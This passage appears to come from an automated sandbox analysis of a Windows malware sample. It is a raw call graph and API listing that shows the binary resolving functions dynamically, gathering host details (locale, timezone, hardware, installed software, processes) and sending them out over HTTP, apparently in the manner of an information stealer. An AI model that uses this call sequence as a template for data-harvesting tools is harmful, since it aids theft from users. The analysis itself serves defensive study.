lstrcpy 14967->14968 14969 3d5e5d 14968->14969 14970 3d5e70 lstrlen 14969->14970 15764 3eaad0 14970->15764 14972 3d5e81 lstrlen GetProcessHeap RtlAllocateHeap 15765 3eaad0 14972->15765 14974 3d5eae lstrlen 14975 3d5ebe 14974->14975 14976 3d5ed7 lstrlen 14975->14976 14977 3d5ee7 14976->14977 14978 3d5ef0 lstrlen 14977->14978 14979 3d5f04 14978->14979 14980 3d5f1a lstrlen 14979->14980 15766 3eaad0 14980->15766 14982 3d5f2a HttpSendRequestA 14983 3d5f35 InternetReadFile 14982->14983 14984 3d5f6a InternetCloseHandle 14983->14984 14988 3d5f61 14983->14988 14984->14909 14986 3ea9b0 4 API calls 14986->14988 14987 3ea8a0 lstrcpy 14987->14988 14988->14983 14988->14984 14988->14986 14988->14987 14990 3e1077 14989->14990 14991 3e1151 14990->14991 14992 3ea820 lstrlen lstrcpy 14990->14992 14991->13760 14992->14990 14998 3e0db7 14993->14998 14994 3e0f17 14994->13768 14995 3e0e27 StrCmpCA 14995->14998 14996 3e0e67 StrCmpCA 14996->14998 14997 3e0ea4 StrCmpCA 14997->14998 14998->14994 14998->14995 14998->14996 14998->14997 14999 3ea820 lstrlen lstrcpy 14998->14999 14999->14998 15001 3e0f67 15000->15001 15002 3e1044 15001->15002 15003 3e0fb2 StrCmpCA 15001->15003 15004 3ea820 lstrlen lstrcpy 15001->15004 15002->13776 15003->15001 15004->15001 15006 3ea740 lstrcpy 15005->15006 15007 3e1a26 15006->15007 15008 3ea9b0 4 API calls 15007->15008 15009 3e1a37 15008->15009 15010 3ea8a0 lstrcpy 15009->15010 15011 3e1a40 15010->15011 15012 3ea9b0 4 API calls 15011->15012 15013 3e1a5b 15012->15013 15014 3ea8a0 lstrcpy 15013->15014 15015 3e1a64 15014->15015 15016 3ea9b0 4 API calls 15015->15016 15017 3e1a7d 15016->15017 15018 3ea8a0 lstrcpy 15017->15018 15019 3e1a86 15018->15019 15020 3ea9b0 4 API calls 15019->15020 15021 3e1aa1 15020->15021 15022 3ea8a0 lstrcpy 15021->15022 15023 3e1aaa 15022->15023 15024 3ea9b0 4 API calls 15023->15024 15025 3e1ac3 15024->15025 15026 3ea8a0 lstrcpy 15025->15026 15027 3e1acc 15026->15027 15028 3ea9b0 4 API calls 15027->15028 15029 3e1ae7 15028->15029 15030 3ea8a0 lstrcpy 15029->15030 15031 3e1af0 15030->15031 15032 3ea9b0 4 API calls 15031->15032 15033 3e1b09 15032->15033 15034 3ea8a0 lstrcpy 15033->15034 15035 3e1b12 15034->15035 15036 3ea9b0 4 API calls 15035->15036 15037 3e1b2d 15036->15037 15038 3ea8a0 lstrcpy 15037->15038 15039 3e1b36 15038->15039 15040 3ea9b0 4 API calls 15039->15040 15041 3e1b4f 15040->15041 15042 3ea8a0 lstrcpy 15041->15042 15043 3e1b58 15042->15043 15044 3ea9b0 4 API calls 15043->15044 15045 3e1b76 15044->15045 15046 3ea8a0 lstrcpy 15045->15046 15047 3e1b7f 15046->15047 15048 3e7500 6 API calls 15047->15048 15049 3e1b96 15048->15049 15050 3ea920 3 API calls 15049->15050 15051 3e1ba9 15050->15051 15052 3ea8a0 lstrcpy 15051->15052 15053 3e1bb2 15052->15053 15054 3ea9b0 4 API calls 15053->15054 15055 3e1bdc 15054->15055 15056 3ea8a0 lstrcpy 15055->15056 15057 3e1be5 15056->15057 15058 3ea9b0 4 API calls 15057->15058 15059 3e1c05 15058->15059 15060 3ea8a0 lstrcpy 15059->15060 15061 3e1c0e 15060->15061 15767 3e7690 GetProcessHeap RtlAllocateHeap 15061->15767 15064 3ea9b0 4 API calls 15065 3e1c2e 15064->15065 15066 3ea8a0 lstrcpy 15065->15066 15067 3e1c37 15066->15067 15068 3ea9b0 4 API calls 15067->15068 15069 3e1c56 15068->15069 15070 3ea8a0 lstrcpy 15069->15070 15071 3e1c5f 15070->15071 15072 3ea9b0 4 API calls 15071->15072 15073 3e1c80 15072->15073 15074 3ea8a0 lstrcpy 15073->15074 15075 3e1c89 15074->15075 15774 3e77c0 GetCurrentProcess IsWow64Process 15075->15774 15078 3ea9b0 4 API calls 15079 3e1ca9 15078->15079 15080 3ea8a0 lstrcpy 15079->15080 15081 3e1cb2 15080->15081 15082 3ea9b0 4 API calls 15081->15082 15083 3e1cd1 15082->15083 15084 3ea8a0 lstrcpy 15083->15084 15085 3e1cda 15084->15085 15086 3ea9b0 4 API calls 15085->15086 15087 3e1cfb 15086->15087 15088 3ea8a0 lstrcpy 15087->15088 15089 3e1d04 15088->15089 15090 3e7850 3 API calls 15089->15090 15091 3e1d14 15090->15091 15092 3ea9b0 4 API calls 15091->15092 15093 3e1d24 15092->15093 15094 3ea8a0 lstrcpy 15093->15094 15095 3e1d2d 15094->15095 15096 3ea9b0 4 API calls 15095->15096 15097 3e1d4c 15096->15097 15098 3ea8a0 lstrcpy 15097->15098 15099 3e1d55 15098->15099 15100 3ea9b0 4 API calls 15099->15100 15101 3e1d75 15100->15101 15102 3ea8a0 lstrcpy 15101->15102 15103 3e1d7e 15102->15103 15104 3e78e0 3 API calls 15103->15104 15105 3e1d8e 15104->15105 15106 3ea9b0 4 API calls 15105->15106 15107 3e1d9e 15106->15107 15108 3ea8a0 lstrcpy 15107->15108 15109 3e1da7 15108->15109 15110 3ea9b0 4 API calls 15109->15110 15111 3e1dc6 15110->15111 15112 3ea8a0 lstrcpy 15111->15112 15113 3e1dcf 15112->15113 15114 3ea9b0 4 API calls 15113->15114 15115 3e1df0 15114->15115 15116 3ea8a0 lstrcpy 15115->15116 15117 3e1df9 15116->15117 15776 3e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15117->15776 15120 3ea9b0 4 API calls 15121 3e1e19 15120->15121 15122 3ea8a0 lstrcpy 15121->15122 15123 3e1e22 15122->15123 15124 3ea9b0 4 API calls 15123->15124 15125 3e1e41 15124->15125 15126 3ea8a0 lstrcpy 15125->15126 15127 3e1e4a 15126->15127 15128 3ea9b0 4 API calls 15127->15128 15129 3e1e6b 15128->15129 15130 3ea8a0 lstrcpy 15129->15130 15131 3e1e74 15130->15131 15778 3e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15131->15778 15134 3ea9b0 4 API calls 15135 3e1e94 15134->15135 15136 3ea8a0 lstrcpy 15135->15136 15137 3e1e9d 15136->15137 15138 3ea9b0 4 API calls 15137->15138 15139 3e1ebc 15138->15139 15140 3ea8a0 lstrcpy 15139->15140 15141 3e1ec5 15140->15141 15142 3ea9b0 4 API calls 15141->15142 15143 3e1ee5 15142->15143 15144 3ea8a0 lstrcpy 15143->15144 15145 3e1eee 15144->15145 15781 3e7b00 GetUserDefaultLocaleName 15145->15781 15148 3ea9b0 4 API calls 15149 3e1f0e 15148->15149 15150 3ea8a0 lstrcpy 15149->15150 15151 3e1f17 15150->15151 15152 3ea9b0 4 API calls 15151->15152 15153 3e1f36 15152->15153 15154 3ea8a0 lstrcpy 15153->15154 15155 3e1f3f 15154->15155 15156 3ea9b0 4 API calls 15155->15156 15157 3e1f60 15156->15157 15158 3ea8a0 lstrcpy 15157->15158 15159 3e1f69 15158->15159 15785 3e7b90 15159->15785 15161 3e1f80 15162 3ea920 3 API calls 15161->15162 15163 3e1f93 15162->15163 15164 3ea8a0 lstrcpy 15163->15164 15165 3e1f9c 15164->15165 15166 3ea9b0 4 API calls 15165->15166 15167 3e1fc6 15166->15167 15168 3ea8a0 lstrcpy 15167->15168 15169 3e1fcf 15168->15169 15170 3ea9b0 4 API calls 15169->15170 15171 3e1fef 15170->15171 15172 3ea8a0 lstrcpy 15171->15172 15173 3e1ff8 15172->15173 15797 3e7d80 GetSystemPowerStatus 15173->15797 15176 3ea9b0 4 API calls 15177 3e2018 15176->15177 15178 3ea8a0 lstrcpy 15177->15178 15179 3e2021 15178->15179 15180 3ea9b0 4 API calls 15179->15180 15181 3e2040 15180->15181 15182 3ea8a0 lstrcpy 15181->15182 15183 3e2049 15182->15183 15184 3ea9b0 4 API calls 15183->15184 15185 3e206a 15184->15185 15186 3ea8a0 lstrcpy 15185->15186 15187 3e2073 15186->15187 15188 3e207e GetCurrentProcessId 15187->15188 15799 3e9470 OpenProcess 15188->15799 15191 3ea920 3 API calls 15192 3e20a4 15191->15192 15193 3ea8a0 lstrcpy 15192->15193 15194 3e20ad 15193->15194 15195 3ea9b0 4 API calls 15194->15195 15196 3e20d7 15195->15196 15197 3ea8a0 lstrcpy 15196->15197 15198 3e20e0 15197->15198 15199 3ea9b0 4 API calls 15198->15199 15200 3e2100 15199->15200 15201 3ea8a0 lstrcpy 15200->15201 15202 3e2109 15201->15202 15804 3e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15202->15804 15205 3ea9b0 4 API calls 15206 3e2129 15205->15206 15207 3ea8a0 lstrcpy 15206->15207 15208 3e2132 15207->15208 15209 3ea9b0 4 API calls 15208->15209 15210 3e2151 15209->15210 15211 3ea8a0 lstrcpy 15210->15211 15212 3e215a 15211->15212 15213 3ea9b0 4 API calls 15212->15213 15214 3e217b 15213->15214 15215 3ea8a0 lstrcpy 15214->15215 15216 3e2184 15215->15216 15808 3e7f60 15216->15808 15219 3ea9b0 4 API calls 15220 3e21a4 15219->15220 15221 3ea8a0 lstrcpy 15220->15221 15222 3e21ad 15221->15222 15223 3ea9b0 4 API calls 15222->15223 15224 3e21cc 15223->15224 15225 3ea8a0 lstrcpy 15224->15225 15226 3e21d5 15225->15226 15227 3ea9b0 4 API calls 15226->15227 15228 3e21f6 15227->15228 15229 3ea8a0 lstrcpy 15228->15229 15230 3e21ff 15229->15230 15821 3e7ed0 GetSystemInfo wsprintfA 15230->15821 15233 3ea9b0 4 API calls 15234 3e221f 15233->15234 15235 3ea8a0 lstrcpy 15234->15235 15236 3e2228 15235->15236 15237 3ea9b0 4 API calls 15236->15237 15238 3e2247 15237->15238 15239 3ea8a0 lstrcpy 15238->15239 15240 3e2250 15239->15240 15241 3ea9b0 4 API calls 15240->15241 15242 3e2270 15241->15242 15243 3ea8a0 lstrcpy 15242->15243 15244 3e2279 15243->15244 15823 3e8100 GetProcessHeap RtlAllocateHeap 15244->15823 15247 3ea9b0 4 API calls 15248 3e2299 15247->15248 15249 3ea8a0 lstrcpy 15248->15249 15250 3e22a2 15249->15250 15251 3ea9b0 4 API calls 15250->15251 15252 3e22c1 15251->15252 15253 3ea8a0 lstrcpy 15252->15253 15254 3e22ca 15253->15254 15255 3ea9b0 4 API calls 15254->15255 15256 3e22eb 15255->15256 15257 3ea8a0 lstrcpy 15256->15257 15258 3e22f4 15257->15258 15829 3e87c0 15258->15829 15261 3ea920 3 API calls 15262 3e231e 15261->15262 15263 3ea8a0 lstrcpy 15262->15263 15264 3e2327 15263->15264 15265 3ea9b0 4 API calls 15264->15265 15266 3e2351 15265->15266 15267 3ea8a0 lstrcpy 15266->15267 15268 3e235a 15267->15268 15269 3ea9b0 4 API calls 15268->15269 15270 3e237a 15269->15270 15271 3ea8a0 lstrcpy 15270->15271 15272 3e2383 15271->15272 15273 3ea9b0 4 API calls 15272->15273 15274 3e23a2 15273->15274 15275 3ea8a0 lstrcpy 15274->15275 15276 3e23ab 15275->15276 15834 3e81f0 15276->15834 15278 3e23c2 15279 3ea920 3 API calls 15278->15279 15280 3e23d5 15279->15280 15281 3ea8a0 lstrcpy 15280->15281 15282 3e23de 15281->15282 15283 3ea9b0 4 API calls 15282->15283 15284 3e240a 15283->15284 15285 3ea8a0 lstrcpy 15284->15285 15286 3e2413 15285->15286 15287 3ea9b0 4 API calls 15286->15287 15288 3e2432 15287->15288 15289 3ea8a0 lstrcpy 15288->15289 15290 3e243b 15289->15290 15291 3ea9b0 4 API calls 15290->15291 15292 3e245c 15291->15292 15293 3ea8a0 lstrcpy 15292->15293 15294 3e2465 15293->15294 15295 3ea9b0 4 API calls 15294->15295 15296 3e2484 15295->15296 15297 3ea8a0 lstrcpy 15296->15297 15298 3e248d 15297->15298 15299 3ea9b0 4 API calls 15298->15299 15300 3e24ae 15299->15300 15301 3ea8a0 lstrcpy 15300->15301 15302 3e24b7 15301->15302 15842 3e8320 15302->15842 15304 3e24d3 15305 3ea920 3 API calls 15304->15305 15306 3e24e6 15305->15306 15307 3ea8a0 lstrcpy 15306->15307 15308 3e24ef 15307->15308 15309 3ea9b0 4 API calls 15308->15309 15310 3e2519 15309->15310 15311 3ea8a0 lstrcpy 15310->15311 15312 3e2522 15311->15312 15313 3ea9b0 4 API calls 15312->15313 15314 3e2543 15313->15314 15315 3ea8a0 lstrcpy 15314->15315 15316 3e254c 15315->15316 15317 3e8320 17 API calls 15316->15317 15318 3e2568 15317->15318 15319 3ea920 3 API calls 15318->15319 15320 3e257b 15319->15320 15321 3ea8a0 lstrcpy 15320->15321 15322 3e2584 15321->15322 15323 3ea9b0 4 API calls 15322->15323 15324 3e25ae 15323->15324 15325 3ea8a0 lstrcpy 15324->15325 15326 3e25b7 15325->15326 15327 3ea9b0 4 API calls 15326->15327 15328 3e25d6 15327->15328 15329 3ea8a0 lstrcpy 15328->15329 15330 3e25df 15329->15330 15331 3ea9b0 4 API calls 15330->15331 15332 3e2600 15331->15332 15333 3ea8a0 lstrcpy 15332->15333 15334 3e2609 15333->15334 15878 3e8680 15334->15878 15336 3e2620 15337 3ea920 3 API calls 15336->15337 15338 3e2633 15337->15338 15339 3ea8a0 lstrcpy 15338->15339 15340 3e263c 15339->15340 15341 3e265a lstrlen 15340->15341 15342 3e266a 15341->15342 15343 3ea740 lstrcpy 15342->15343 15344 3e267c 15343->15344 15345 3d1590 lstrcpy 15344->15345 15346 3e268d 15345->15346 15888 3e5190 15346->15888 15348 3e2699 15348->13780 16076 3eaad0 15349->16076 15351 3d5009 InternetOpenUrlA 15355 3d5021 15351->15355 15352 3d502a InternetReadFile 15352->15355 15353 3d50a0 InternetCloseHandle InternetCloseHandle 15354 3d50ec 15353->15354 15354->13784 15355->15352 15355->15353 16077 3d98d0 15356->16077 15358 3e0759 15359 3e077d 15358->15359 15360 3e0a38 15358->15360 15363 3e0799 StrCmpCA 15359->15363 15361 3d1590 lstrcpy 15360->15361 15362 3e0a49 15361->15362 16253 3e0250 15362->16253 15365 3e07a8 15363->15365 15366 3e0843 15363->15366 15368 3ea7a0 lstrcpy 15365->15368 15369 3e0865 StrCmpCA 15366->15369 15370 3e07c3 15368->15370 15371 3e0874 15369->15371 15408 3e096b 15369->15408 15372 3d1590 lstrcpy 15370->15372 15373 3ea740 lstrcpy 15371->15373 15374 3e080c 15372->15374 15376 3e0881 15373->15376 15377 3ea7a0 lstrcpy 15374->15377 15375 3e099c StrCmpCA 15378 3e09ab 15375->15378 15379 3e0a2d 15375->15379 15380 3ea9b0 4 API calls 15376->15380 15381 3e0823 15377->15381 15383 3d1590 lstrcpy 15378->15383 15379->13788 15384 3e08ac 15380->15384 15382 3ea7a0 lstrcpy 15381->15382 15385 3e083e 15382->15385 15386 3e09f4 15383->15386 15387 3ea920 3 API calls 15384->15387 16080 3dfb00 15385->16080 15389 3ea7a0 lstrcpy 15386->15389 15390 3e08b3 15387->15390 15391 3e0a0d 15389->15391 15392 3ea9b0 4 API calls 15390->15392 15393 3ea7a0 lstrcpy 15391->15393 15394 3e08ba 15392->15394 15396 3e0a28 15393->15396 15395 3ea8a0 lstrcpy 15394->15395 16196 3e0030 15396->16196 15408->15375 15728 3ea7a0 lstrcpy 15727->15728 15729 3d1683 15728->15729 15730 3ea7a0 lstrcpy 15729->15730 15731 3d1695 15730->15731 15732 3ea7a0 lstrcpy 15731->15732 15733 3d16a7 15732->15733 15734 3ea7a0 lstrcpy 15733->15734 15735 3d15a3 15734->15735 15735->14611 15737 3d47c6 15736->15737 15738 3d4838 lstrlen 15737->15738 15762 3eaad0 15738->15762 15740 3d4848 InternetCrackUrlA 15741 3d4867 15740->15741 15741->14688 15743 3ea740 lstrcpy 15742->15743 15744 3e8b74 15743->15744 15745 3ea740 lstrcpy 15744->15745 15746 3e8b82 GetSystemTime 15745->15746 15747 3e8b99 15746->15747 15748 3ea7a0 lstrcpy 15747->15748 15749 3e8bfc 15748->15749 15749->14703 15751 3ea931 15750->15751 15752 3ea988 15751->15752 15754 3ea968 lstrcpy lstrcat 15751->15754 15753 3ea7a0 lstrcpy 15752->15753 15755 3ea994 15753->15755 15754->15752 15755->14707 15756->14821 15758 3d9af9 LocalAlloc 15757->15758 15759 3d4eee 15757->15759 15758->15759 15760 3d9b14 CryptStringToBinaryA 15758->15760 15759->14709 15759->14712 15760->15759 15761 3d9b39 LocalFree 15760->15761 15761->15759 15762->15740 15763->14831 15764->14972 15765->14974 15766->14982 15895 3e77a0 15767->15895 15770 3e1c1e 15770->15064 15771 3e76c6 RegOpenKeyExA 15772 3e76e7 RegQueryValueExA 15771->15772 15773 3e7704 RegCloseKey 15771->15773 15772->15773 15773->15770 15775 3e1c99 15774->15775 15775->15078 15777 3e1e09 15776->15777 15777->15120 15779 3e7a9a wsprintfA 15778->15779 15780 3e1e84 15778->15780 15779->15780 15780->15134 15782 3e7b4d 15781->15782 15783 3e1efe 15781->15783 15902 3e8d20 LocalAlloc CharToOemW 15782->15902 15783->15148 15786 3ea740 lstrcpy 15785->15786 15787 3e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15786->15787 15794 3e7c25 15787->15794 15788 3e7d18 15790 3e7d1e LocalFree 15788->15790 15791 3e7d28 15788->15791 15789 3e7c46 GetLocaleInfoA 15789->15794 15790->15791 15793 3ea7a0 lstrcpy 15791->15793 15792 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15792->15794 15795 3e7d37 15793->15795 15794->15788 15794->15789 15794->15792 15796 3ea8a0 lstrcpy 15794->15796 15795->15161 15796->15794 15798 3e2008 15797->15798 15798->15176 15800 3e94b5 15799->15800 15801 3e9493 GetModuleFileNameExA CloseHandle 15799->15801 15802 3ea740 lstrcpy 15800->15802 15801->15800 15803 3e2091 15802->15803 15803->15191 15805 3e7e68 RegQueryValueExA 15804->15805 15806 3e2119 15804->15806 15807 3e7e8e RegCloseKey 15805->15807 15806->15205 15807->15806 15809 3e7fb9 GetLogicalProcessorInformationEx 15808->15809 15810 3e7fd8 GetLastError 15809->15810 15815 3e8029 15809->15815 15811 3e8022 15810->15811 15820 3e7fe3 15810->15820 15813 3e2194 15811->15813 15817 3e89f0 2 API calls 15811->15817 15813->15219 15816 3e89f0 2 API calls 15815->15816 15818 3e807b 15816->15818 15817->15813 15818->15811 15819 3e8084 wsprintfA 15818->15819 15819->15813 15820->15809 15820->15813 15903 3e89f0 15820->15903 15906 3e8a10 GetProcessHeap RtlAllocateHeap 15820->15906 15822 3e220f 15821->15822 15822->15233 15824 3e89b0 15823->15824 15825 3e814d GlobalMemoryStatusEx 15824->15825 15826 3e8163 __aulldiv 15825->15826 15827 3e819b wsprintfA 15826->15827 15828 3e2289 15827->15828 15828->15247 15830 3e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15829->15830 15832 3ea740 lstrcpy 15830->15832 15833 3e230b 15832->15833 15833->15261 15835 3ea740 lstrcpy 15834->15835 15836 3e8229 15835->15836 15837 3e8263 15836->15837 15839 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15839 15841 3ea8a0 lstrcpy 15836->15841 15838 3ea7a0 lstrcpy 15837->15838 15840 3e82dc 15838->15840 15839->15836 15840->15278 15841->15836 15843 3ea740 lstrcpy 15842->15843 15844 3e835c RegOpenKeyExA 15843->15844 15845 3e83ae 15844->15845 15846 3e83d0 15844->15846 15847 3ea7a0 lstrcpy 15845->15847 15848 3e83f8 RegEnumKeyExA 15846->15848 15849 3e8613 RegCloseKey 15846->15849 15860 3e83bd 15847->15860 15850 3e860e 15848->15850 15851 3e843f wsprintfA RegOpenKeyExA 15848->15851 15852 3ea7a0 lstrcpy 15849->15852 15850->15849 15853 3e8485 RegCloseKey RegCloseKey 15851->15853 15854 3e84c1 RegQueryValueExA 15851->15854 15852->15860 15857 3ea7a0 lstrcpy 15853->15857 15855 3e84fa lstrlen 15854->15855 15856 3e8601 RegCloseKey 15854->15856 15855->15856 15858 3e8510 15855->15858 15856->15850 15857->15860 15859 3ea9b0 4 API calls 15858->15859 15861 3e8527 15859->15861 15860->15304 15862 3ea8a0 lstrcpy 15861->15862 15863 3e8533 15862->15863 15864 3ea9b0 4 API calls 15863->15864 15865 3e8557 15864->15865 15866 3ea8a0 lstrcpy 15865->15866 15867 3e8563 15866->15867 15868 3e856e RegQueryValueExA 15867->15868 15868->15856 15869 3e85a3 15868->15869 15870 3ea9b0 4 API calls 15869->15870 15871 3e85ba 15870->15871 15872 3ea8a0 lstrcpy 15871->15872 15873 3e85c6 15872->15873 15874 3ea9b0 4 API calls 15873->15874 15875 3e85ea 15874->15875 15876 3ea8a0 lstrcpy 15875->15876 15877 3e85f6 15876->15877 15877->15856 15879 3ea740 lstrcpy 15878->15879 15880 3e86bc CreateToolhelp32Snapshot Process32First 15879->15880 15881 3e875d CloseHandle 15880->15881 15882 3e86e8 Process32Next 15880->15882 15883 3ea7a0 lstrcpy 15881->15883 15882->15881 15887 3e86fd 15882->15887 15885 3e8776 15883->15885 15884 3ea8a0 lstrcpy 15884->15887 15885->15336 15886 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15886->15887 15887->15882 15887->15884 15887->15886 15889 3ea7a0 lstrcpy 15888->15889 15890 3e51b5 15889->15890 15891 3d1590 lstrcpy 15890->15891 15892 3e51c6 15891->15892 15907 3d5100 15892->15907 15894 3e51cf 15894->15348 15898 3e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15895->15898 15897 3e76b9 15897->15770 15897->15771 15899 3e7765 RegQueryValueExA 15898->15899 15900 3e7780 RegCloseKey 15898->15900 15899->15900 15901 3e7793 15900->15901 15901->15897 15902->15783 15904 3e8a0c 15903->15904 15905 3e89f9 GetProcessHeap HeapFree 15903->15905 15904->15820 15905->15904 15906->15820 15908 3ea7a0 lstrcpy 15907->15908 15909 3d5119 15908->15909 15910 3d47b0 2 API calls 15909->15910 15911 3d5125 15910->15911 16067 3e8ea0 15911->16067 15913 3d5184 15914 3d5192 lstrlen 15913->15914 15915 3d51a5 15914->15915 15916 3e8ea0 4 API calls 15915->15916 15917 3d51b6 15916->15917 15918 3ea740 lstrcpy 15917->15918 15919 3d51c9 15918->15919 15920 3ea740 lstrcpy 15919->15920 15921 3d51d6 15920->15921 15922 3ea740 lstrcpy 15921->15922 15923 3d51e3 15922->15923 15924 3ea740 lstrcpy 15923->15924 15925 3d51f0 15924->15925 15926 3ea740 lstrcpy 15925->15926 15927 3d51fd InternetOpenA StrCmpCA 15926->15927 15928 3d522f 15927->15928 15929 3d58c4 InternetCloseHandle 15928->15929 15930 3e8b60 3 API calls 15928->15930 15936 3d58d9 ctype 15929->15936 15931 3d524e 15930->15931 15932 3ea920 3 API calls 15931->15932 15933 3d5261 15932->15933 15934 3ea8a0 lstrcpy 15933->15934 15935 3d526a 15934->15935 15937 3ea9b0 4 API calls 15935->15937 15940 3ea7a0 lstrcpy 15936->15940 15938 3d52ab 15937->15938 15939 3ea920 3 API calls 15938->15939 15941 3d52b2 15939->15941 15948 3d5913 15940->15948 15942 3ea9b0 4 API calls 15941->15942 15943 3d52b9 15942->15943 15944 3ea8a0 lstrcpy 15943->15944 15945 3d52c2 15944->15945 15946 3ea9b0 4 API calls 15945->15946 15947 3d5303 15946->15947 15949 3ea920 3 API calls 15947->15949 15948->15894 15950 3d530a 15949->15950 15951 3ea8a0 lstrcpy 15950->15951 15952 3d5313 15951->15952 15953 3d5329 InternetConnectA 15952->15953 15953->15929 15954 3d5359 HttpOpenRequestA 15953->15954 15956 3d58b7 InternetCloseHandle 15954->15956 15957 3d53b7 15954->15957 15956->15929 15958 3ea9b0 4 API calls 15957->15958 15959 3d53cb 15958->15959 15960 3ea8a0 lstrcpy 15959->15960 15961 3d53d4 15960->15961 15962 3ea920 3 API calls 15961->15962 15963 3d53f2 15962->15963 15964 3ea8a0 lstrcpy 15963->15964 15965 3d53fb 15964->15965 15966 3ea9b0 4 API calls 15965->15966 15967 3d541a 15966->15967 15968 3ea8a0 lstrcpy 15967->15968 15969 3d5423 15968->15969 15970 3ea9b0 4 API calls 15969->15970 15971 3d5444 15970->15971 15972 3ea8a0 lstrcpy 15971->15972 15973 3d544d 15972->15973 15974 3ea9b0 4 API calls 15973->15974 15975 3d546e 15974->15975 15976 3ea8a0 lstrcpy 15975->15976 16068 3e8ead CryptBinaryToStringA 16067->16068 16069 3e8ea9 16067->16069 16068->16069 16070 3e8ece GetProcessHeap RtlAllocateHeap 16068->16070 16069->15913 16070->16069 16071 3e8ef4 ctype 16070->16071 16072 3e8f05 CryptBinaryToStringA 16071->16072 16072->16069 16076->15351 16319 3d9880 16077->16319 16079 3d98e1 16079->15358 16081 3ea740 lstrcpy 16080->16081 16082 3dfb16 16081->16082 16357 3e8de0 16082->16357 16254 3ea740 lstrcpy 16253->16254 16255 3e0266 16254->16255 16256 3e8de0 2 API calls 16255->16256 16257 3e027b 16256->16257 16258 3ea920 3 API calls 16257->16258 16259 3e028b 16258->16259 16260 3ea8a0 lstrcpy 16259->16260 16261 3e0294 16260->16261 16262 3ea9b0 4 API calls 16261->16262 16263 3e02b8 16262->16263 16320 3d988d 16319->16320 16323 3d6fb0 16320->16323 16322 3d98ad ctype 16322->16079 16326 3d6d40 16323->16326 16327 3d6d63 16326->16327 16339 3d6d59 16326->16339 16327->16339 16340 3d6660 16327->16340 16329 3d6dbe 16329->16339 16346 3d69b0 16329->16346 16331 3d6e2a 16332 3d6ee6 VirtualFree 16331->16332 16334 3d6ef7 16331->16334 16331->16339 16332->16334 16333 3d6f41 16337 3e89f0 2 API calls 16333->16337 16333->16339 16334->16333 16335 3d6f38 16334->16335 16336 3d6f26 FreeLibrary 16334->16336 16338 3e89f0 2 API calls 16335->16338 16336->16334 16337->16339 16338->16333 16339->16322 16341 3d668f VirtualAlloc 16340->16341 16343 3d6730 16341->16343 16345 3d673c 16341->16345 16344 3d6743 VirtualAlloc 16343->16344 16343->16345 16344->16345 16345->16329 16347 3d69c9 16346->16347 16351 3d69d5 16346->16351 16348 3d6a09 LoadLibraryA 16347->16348 16347->16351 16349 3d6a32 16348->16349 16348->16351 16353 3d6ae0 16349->16353 16356 3e8a10 GetProcessHeap RtlAllocateHeap 16349->16356 16351->16331 16352 3d6ba8 GetProcAddress 16352->16351 16352->16353 16353->16351 16353->16352 16354 3e89f0 2 API calls 16354->16353 16355 3d6a8b 16355->16351 16355->16354 16356->16355

                      Executed Functions

                      Function 003E9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 660 3e9860-3e9874 call 3e9750 663 3e987a-3e9a8e call 3e9780 GetProcAddress * 21 660->663 664 3e9a93-3e9af2 LoadLibraryA * 5 660->664 663->664 666 3e9b0d-3e9b14 664->666 667 3e9af4-3e9b08 GetProcAddress 664->667 669 3e9b46-3e9b4d 666->669 670 3e9b16-3e9b41 GetProcAddress * 2 666->670 667->666 671 3e9b4f-3e9b63 GetProcAddress 669->671 672 3e9b68-3e9b6f 669->672 670->669 671->672 673 3e9b89-3e9b90 672->673 674 3e9b71-3e9b84 GetProcAddress 672->674 675 3e9b92-3e9bbc GetProcAddress * 2 673->675 676 3e9bc1-3e9bc2 673->676 674->673 675->676
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003E98A1
                      • GetProcAddress.KERNEL32(74DD0000,010822F0), ref: 003E98BA
                      • GetProcAddress.KERNEL32(74DD0000,010821B8), ref: 003E98D2
                      • GetProcAddress.KERNEL32(74DD0000,01082440), ref: 003E98EA
                      • GetProcAddress.KERNEL32(74DD0000,010823E0), ref: 003E9903
                      • GetProcAddress.KERNEL32(74DD0000,01088E60), ref: 003E991B
                      • GetProcAddress.KERNEL32(74DD0000,01075690), ref: 003E9933
                      • GetProcAddress.KERNEL32(74DD0000,010758B0), ref: 003E994C
                      • GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003E9964
                      • GetProcAddress.KERNEL32(74DD0000,01082290), ref: 003E997C
                      • GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003E9995
                      • GetProcAddress.KERNEL32(74DD0000,01082458), ref: 003E99AD
                      • GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003E99C5
                      • GetProcAddress.KERNEL32(74DD0000,01082350), ref: 003E99DE
                      • GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003E99F6
                      • GetProcAddress.KERNEL32(74DD0000,01075850), ref: 003E9A0E
                      • GetProcAddress.KERNEL32(74DD0000,01082428), ref: 003E9A27
                      • GetProcAddress.KERNEL32(74DD0000,01082260), ref: 003E9A3F
                      • GetProcAddress.KERNEL32(74DD0000,010756B0), ref: 003E9A57
                      • GetProcAddress.KERNEL32(74DD0000,010822A8), ref: 003E9A70
                      • GetProcAddress.KERNEL32(74DD0000,010759B0), ref: 003E9A88
                      • LoadLibraryA.KERNEL32(010821D0,?,003E6A00), ref: 003E9A9A
                      • LoadLibraryA.KERNEL32(01082320,?,003E6A00), ref: 003E9AAB
                      • LoadLibraryA.KERNEL32(010821E8,?,003E6A00), ref: 003E9ABD
                      • LoadLibraryA.KERNEL32(01082338,?,003E6A00), ref: 003E9ACF
                      • LoadLibraryA.KERNEL32(01082170,?,003E6A00), ref: 003E9AE0
                      • GetProcAddress.KERNEL32(75A70000,01082278), ref: 003E9B02
                      • GetProcAddress.KERNEL32(75290000,01082188), ref: 003E9B23
                      • GetProcAddress.KERNEL32(75290000,01082368), ref: 003E9B3B
